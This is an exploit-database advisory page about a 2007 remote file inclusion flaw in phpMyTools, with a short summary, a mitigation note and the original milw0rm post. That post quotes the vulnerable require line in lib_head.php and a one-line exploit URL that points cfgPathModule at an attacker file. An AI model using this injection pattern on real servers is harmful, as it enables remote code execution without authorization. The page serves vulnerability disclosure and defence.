header-logo
Suggest Exploit
vendor:
phpMyTools
by:
GolD_M = Mahmood_ali && Google.Com
7.5
CVSS
HIGH
Remote File Inclusion
Not mentioned
CWE
Product Name: phpMyTools
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2007

Remote File Inclusion in phpMyTools

The vulnerability allows an attacker to include a remote file in the 'lib_head.php' file, which can lead to remote code execution.

Mitigation:

The vulnerability can be mitigated by properly validating and sanitizing user input before including files.
Source

Exploit-DB raw data:

=================================================================
URL.S = http://www.phpmytools.org/pmr3.0.11_20050105.tar.gz     !
=================================================================
Finded by GolD_M = Mahmood_ali && Google.Com                    !
=================================================================
Greetz For : Tryag-Team & 020 :)                                !
=================================================================
/include/lib/lib_head.php                                       !
=================================================================
<?php require "$cfgPathModule/my_javascript_inc.php"; ?>        !
=================================================================
Exploit                                                         !
=================================================================
[path]/include/lib/lib_head.php?cfgPathModule=Evil.txt?         !
=================================================================

# milw0rm.com [2007-01-27]